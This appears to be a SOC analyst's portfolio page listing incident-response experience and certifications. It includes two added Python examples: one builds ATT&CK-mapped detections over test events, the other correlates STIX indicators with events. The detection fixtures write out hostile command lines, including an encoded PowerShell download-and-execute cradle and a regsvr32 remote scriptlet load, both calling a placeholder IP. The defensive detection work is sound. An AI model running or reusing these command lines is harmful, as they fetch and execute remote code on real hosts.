Cybersecurity Professional

Cyber Defense & Detection

Incident Response · SIEM Engineering · SOAR Automation

Enterprise SOC analyst with 4.5+ years defending critical infrastructure. Closed 300+ high-severity incidents, reduced triage time by 60%, and engineered 85+ production detection rules mapped to MITRE ATT&CK.

Towson, MD · Active & Available

Rajkumar Vadthyavath — M.S. Applied IT (GPA 3.93), Splunk Power User, AZ-104, CompTIA Security+. Best Performer at TCS SOC Operations, Dec 2023.

300+ Incidents Closed · 60% Triage Reduction · 4.5yr Experience
Splunk Enterprise · Microsoft Sentinel · CrowdStrike Falcon · Microsoft Defender · Azure / Entra ID · MITRE ATT&CK · Trellix / McAfee · SOAR Automation
About Me

Defending enterprise systems is more than a role — it's a mission.


Rajkumar Vadthyavath is an enterprise SOC analyst with 4.5 years of hands-on incident response, detection engineering, and SOAR automation experience in a 25+ analyst, hybrid-cloud environment supporting a 30,000-employee critical manufacturing organization.

Track record of closing measurable gaps: reduced alert triage time from 30 to 12 minutes, cut the false-positive rate from 18% to 11%, and accelerated known-indicator detection by 70% through automated threat-intelligence correlation.

Currently pursuing M.S. Applied IT at Towson University (GPA 3.93) while serving as Cybersecurity Instructor and Graduate Teaching Assistant. Recognized as Best Performer among 25+ analysts at TCS SOC Operations, December 2023.

300+ High-Severity Incidents Investigated & Closed
60% Reduction in Alert Triage Time
85+ Production Detection Rules Built
70% Faster Threat Intelligence Detection
Skills & Expertise

Technical Arsenal

A full-stack SOC capability set built across 4.5 years of real-world threat response in enterprise environments.

SIEM (Splunk SPL + KQL): 96%
Incident Response (IR): 95%
SOAR Automation & Playbooks: 92%
Detection Engineering: 93%
EDR (Defender / CrowdStrike): 90%
Threat Intelligence (STIX/TAXII): 88%
Cloud Security (Azure / AWS): 85%
Python / SOAR Scripting: 82%
Incident Response · Splunk SPL · Microsoft Sentinel · SOAR Playbooks · MITRE ATT&CK · KQL Queries · CrowdStrike · Zero Trust · Threat Intel · Azure Entra ID · NIST CSF

Certifications

🏆Splunk Core Certified Power User
☁️Azure Administrator Associate (AZ-104)
🔐CompTIA Security+ (SY0-701)
🛡️(ISC)² Certified in Cybersecurity (CC)
🎯CompTIA CySA+ (Pursuing)
AWS Cloud Practitioner (Pursuing)
Experience

A career built on closing threats and driving measurable security outcomes.

Senior Cyber Incident Response Analyst
Tata Consultancy Services · Tata Steel Europe (Onsite)
Led end-to-end investigation of 300+ high-severity incidents spanning identity compromise, malware, PowerShell/LOLBin abuse, lateral movement, and executive-targeted phishing. Designated senior escalation authority for a 25+-analyst SOC. Engineered 85+ production detection rules (50+ SPL and 35+ KQL). Architected 20+ SOAR playbooks that cut triage from 30 to 12 minutes. Recognized as Best Performer, Dec 2023.
Splunk SOAR Microsoft Sentinel MITRE ATT&CK EDR Threat Intel STIX/TAXII ServiceNow
2020 – 2024
Cybersecurity Instructor — Cloud Operations & Detection Engineering
Towson University · Towson, MD
Designed and delivered enterprise-grade lab curriculum covering Azure cloud operations, SIEM monitoring, and automated IR workflows. Built repeatable detection engineering frameworks deployed consistently across multiple graduate cohorts.
Azure SIEM Detection Engineering Curriculum Design
Aug – Dec 2025
Graduate Teaching Assistant — Cybersecurity & Big Data Analytics
Towson University · Towson, MD
Supported graduate labs in log analysis, data interpretation, and operational performance evaluation. Delivered structured feedback improving students' analytical reasoning and documentation quality.
Log Analysis Big Data Graduate Education
Aug 2025 – May 2026
Network Security Intern — Cisco Structured Program
Cisco Systems · Remote
Completed Cisco network security internship covering routing & switching fundamentals, IP addressing, security protocol configuration, and network device hardening in simulated enterprise environments.
Cisco Network Security TCP/IP Device Hardening
May – Jun 2020
Key Projects

High-impact security engineering at scale

🏛️
Zero Trust Architecture Design
Designed end-to-end Zero Trust architecture aligned to NIST SP 800-207 and CISA ZT Maturity Model with Conditional Access, MFA, RBAC segmentation, and PIM controls. Full mapping to NIST SP 800-53 and ISO 27001.
Azure AD NIST 800-207 ISO 27001 ZT Maturity
🔍
Detection Engineering — 85+ Rules
Built and maintained 50+ Splunk SPL correlation searches and 35+ Sentinel KQL analytics rules mapped to MITRE ATT&CK. Behaviorally baselined 500+ privileged accounts and added regression testing so that triaged false positives do not recur after rule changes.
SPL KQL MITRE ATT&CK
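To show what "ATT&CK-mapped rule plus regression testing" looks like in practice, here is an added Python illustration; it is not Rajkumar's production SPL or KQL, none of which appears on this page. Two detections (encoded PowerShell carrying a download cradle, and regsvr32 loading a remote scriptlet) run over constructed process-creation events, and a fixture of events that were once triaged as benign must stay silent before any rule change ships. Hostnames, parent processes, the tuned-out SCCM agent and the IP addresses are all invented for the example.

```python
"""Added example: two ATT&CK-mapped process-creation detections plus a
regression fixture of known-benign events that must stay silent."""
import base64
import re
from dataclasses import dataclass
from typing import Callable, Dict, FrozenSet, List, Optional


def _enc(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed events in a Sysmon Event ID 1 style; hosts, parents and IPs are invented.
SUSPICIOUS_EVENTS: List[Dict[str, str]] = [
    {"host": "WS-0142", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/p')")},
    {"host": "WS-0290", "parent": "explorer.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://198.51.100.23/x.sct scrobj.dll"},
]
# Events that fired once, were triaged as benign, and now gate every rule change.
BENIGN_EVENTS: List[Dict[str, str]] = [
    {"host": "WS-0101", "parent": "msiexec.exe", "image": "regsvr32.exe",
     "cmdline": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\lib.dll"'},
    {"host": "SRV-SCCM1", "parent": "CcmExec.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc "
                + _enc("Invoke-WebRequest -Uri http://sccm.corp.example/inv.ps1 -OutFile C:\\Windows\\CCM\\inv.ps1")},
]

ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{20,})")
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|frombase64string")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encoded_ps_download_cradle(ev: Dict[str, str]) -> bool:
    """T1059.001: encoded PowerShell whose decoded body contains a download cradle."""
    if ev["image"].lower() != "powershell.exe":
        return False
    body = decode_encoded_command(ev["cmdline"])
    return bool(body and CRADLE.search(body))


def regsvr32_remote_scriptlet(ev: Dict[str, str]) -> bool:
    """T1218.010: regsvr32 loading scrobj.dll with a remote /i: scriptlet."""
    c = ev["cmdline"].lower()
    return ev["image"].lower() == "regsvr32.exe" and "scrobj.dll" in c and "/i:http" in c


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    match: Callable[[Dict[str, str]], bool]
    # Parent images tuned out after triage; in practice each entry cites the closed FP ticket.
    benign_parents: FrozenSet[str] = frozenset()


RULES: List[Rule] = [
    Rule("Encoded PowerShell download cradle", "T1059.001", encoded_ps_download_cradle,
         frozenset({"ccmexec.exe"})),  # the SCCM agent legitimately runs encoded download scripts
    Rule("Regsvr32 remote scriptlet", "T1218.010", regsvr32_remote_scriptlet),
]


def run_rules(events, rules=RULES) -> List[Dict[str, str]]:
    """One alert per (rule, event) hit, skipping parents the rule has tuned out."""
    alerts = []
    for ev in events:
        for rule in rules:
            if ev["parent"].lower() in rule.benign_parents:
                continue
            if rule.match(ev):
                alerts.append({"rule": rule.name, "technique": rule.technique,
                               "host": ev["host"], "cmdline": ev["cmdline"]})
    return alerts


def regression_ok(benign=BENIGN_EVENTS, rules=RULES) -> bool:
    """Deployment gate: every known-benign event must still produce no alert."""
    return not run_rules(benign, rules)


if __name__ == "__main__":
    for a in run_rules(SUSPICIOUS_EVENTS):
        print(f"[{a['technique']}] {a['rule']} on {a['host']}")
    print("regression:", "pass" if regression_ok() else "FAIL")
```

The point carried over to a SIEM is structural rather than language-specific: the allowlist is data attached to the rule (with a ticket reference), the decoded payload is inspected instead of matching on the raw `-enc` flag alone, and the benign fixture runs before the rule is promoted, so a tuning change that re-introduces an old false positive fails the gate instead of reaching analysts.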
🎯
Threat Intelligence Automation
Operationalized STIX/TAXII feeds from 6+ intelligence sources into Splunk and Sentinel. Automated IOC-to-alert correlation reducing known-indicator detection time by 70%. Proactively identified APT staging infrastructure before production impact.
STIX/TAXII AlienVault OTX VirusTotal URLScan.io
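The IOC-to-alert correlation described above can be sketched in Python as an added example; it is not the author's Splunk or Sentinel integration. A handful of constructed STIX 2.1 indicator objects, in the shape a TAXII collection returns, are flattened into an index keyed by observable type and value, filtered by their validity window, and matched against constructed DNS and proxy events. Only simple equality patterns (single or OR-joined comparisons) are flattened; composite patterns are reported as skipped rather than silently dropped. Indicator ids, names, domains and addresses are invented (RFC 5737 and RFC 1918 ranges, `.example` names).

```python
"""Added example: flatten STIX 2.1 indicator patterns into an IOC index and
correlate it against constructed DNS/proxy events."""
import re
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Constructed STIX 2.1 indicator objects as a TAXII collection would return them;
# ids, names and observables are invented.
INDICATORS = [
    {"id": "indicator--00000000-0000-4000-8000-000000000001",
     "pattern": "[domain-name:value = 'update-cdn.example']",
     "valid_from": "2024-01-10T00:00:00Z", "valid_until": "2025-12-31T00:00:00Z",
     "name": "Staging domain", "confidence": 85},
    {"id": "indicator--00000000-0000-4000-8000-000000000002",
     "pattern": "[ipv4-addr:value = '203.0.113.7' OR url:value = 'http://203.0.113.7/x.php']",
     "valid_from": "2024-03-01T00:00:00Z", "valid_until": None,
     "name": "Payload delivery host", "confidence": 70},
    {"id": "indicator--00000000-0000-4000-8000-000000000003",
     "pattern": "[file:hashes.'SHA-256' = '" + "a" * 64 + "']",
     "valid_from": "2023-01-01T00:00:00Z", "valid_until": "2023-06-30T00:00:00Z",
     "name": "Expired loader hash", "confidence": 50},
    {"id": "indicator--00000000-0000-4000-8000-000000000004",
     "pattern": "[file:name = 'x.dll' AND file:size > 4096]",
     "valid_from": "2024-01-01T00:00:00Z", "valid_until": None,
     "name": "Composite pattern (not flattenable)", "confidence": 40},
]

# Constructed DNS, proxy and EDR events from RFC 1918 hosts.
EVENTS = [
    {"ts": "2024-06-01T08:12:03Z", "src_ip": "10.20.4.17", "domain": "Update-CDN.example"},
    {"ts": "2024-06-01T08:12:09Z", "src_ip": "10.20.4.17", "dst_ip": "203.0.113.7",
     "url": "http://203.0.113.7/x.php"},
    {"ts": "2024-06-01T08:13:00Z", "src_ip": "10.20.4.22", "domain": "www.example.org"},
    {"ts": "2024-06-01T08:14:00Z", "src_ip": "10.20.4.22", "sha256": "a" * 64},
]
NOW = datetime(2024, 6, 1, 9, 0, tzinfo=timezone.utc)  # fixed clock so the run is repeatable

# One equality comparison, and a whole pattern made only of OR-joined comparisons.
COMPARISON = r"([\w-]+):([\w.'-]+)\s*=\s*'([^']*)'"
SIMPLE_PATTERN = re.compile(r"\[\s*" + COMPARISON + r"(?:\s+OR\s+" + COMPARISON + r")*\s*\]")
COMPARISON_RE = re.compile(COMPARISON)

# STIX object path -> event field that carries the same observable.
FIELD_FOR = {("domain-name", "value"): "domain", ("ipv4-addr", "value"): "dst_ip",
             ("url", "value"): "url", ("file", "hashes.'SHA-256'"): "sha256"}


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def build_index(indicators, now=NOW):
    """Return ({(object, path, value): indicator}, [(id, reason) for skipped indicators])."""
    index: Dict[Tuple[str, str, str], dict] = {}
    skipped: List[Tuple[str, str]] = []
    for ind in indicators:
        if not SIMPLE_PATTERN.fullmatch(ind["pattern"]):
            skipped.append((ind["id"], "unsupported pattern shape"))  # never drop silently
            continue
        until = ind.get("valid_until")
        if now < _ts(ind["valid_from"]) or (until and now >= _ts(until)):
            skipped.append((ind["id"], "outside validity window"))
            continue
        for obj, path, value in COMPARISON_RE.findall(ind["pattern"]):
            # Lower-casing trades URL-path precision for recall on domains and hashes.
            index[(obj, path, value.lower())] = ind
    return index, skipped


def correlate(events, index):
    """One alert per event with at least one IOC hit; severity follows the best confidence."""
    alerts = []
    for ev in events:
        hits = []
        for (obj, path), field in FIELD_FOR.items():
            value = ev.get(field)
            ind = index.get((obj, path, value.lower())) if value else None
            if ind:
                hits.append({"field": field, "value": value, "indicator": ind["id"],
                             "name": ind["name"], "confidence": ind["confidence"]})
        if hits:
            top = max(h["confidence"] for h in hits)
            alerts.append({"ts": ev["ts"], "src_ip": ev["src_ip"], "hits": hits,
                           "severity": "high" if top >= 80 else "medium"})
    return alerts


if __name__ == "__main__":
    index, skipped = build_index(INDICATORS)
    for ind_id, why in skipped:
        print(f"skipped {ind_id}: {why}")
    for alert in correlate(EVENTS, index):
        names = ", ".join(h["name"] for h in alert["hits"])
        print(f"{alert['ts']} {alert['src_ip']} {alert['severity'].upper()}: {names}")
```

Two details matter more than the matching itself: expired indicators are excluded at index-build time rather than at alert time, so stale feed entries never reach the analyst, and patterns the flattener cannot represent are surfaced in the skipped list, which is the signal that a feed has started publishing shapes the pipeline does not handle.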
📧
Phishing IR & Awareness Program
Directed phishing investigation pipeline for spear-phishing, executive impersonation, and QR-code credential harvesting. Automated URL/attachment detonation via SOAR; led cross-functional awareness initiative reducing phishing click rate by 50%.
SOAR ANY.RUN Email IR
Recognition
Rajkumar's technical leadership during a high-severity ransomware precursor threatening production OT systems was exceptional. His depth of investigation, speed of containment, and thorough documentation set a benchmark for the entire team.

TCS SOC Operations Leadership
Best Performer Award · December 2023 · Selected from 25+ Analysts
Let's Connect

Ready to strengthen your security posture?

Available for SOC analyst roles, detection engineering positions, and cybersecurity consulting opportunities. Let's discuss how I can bring measurable impact to your security operations.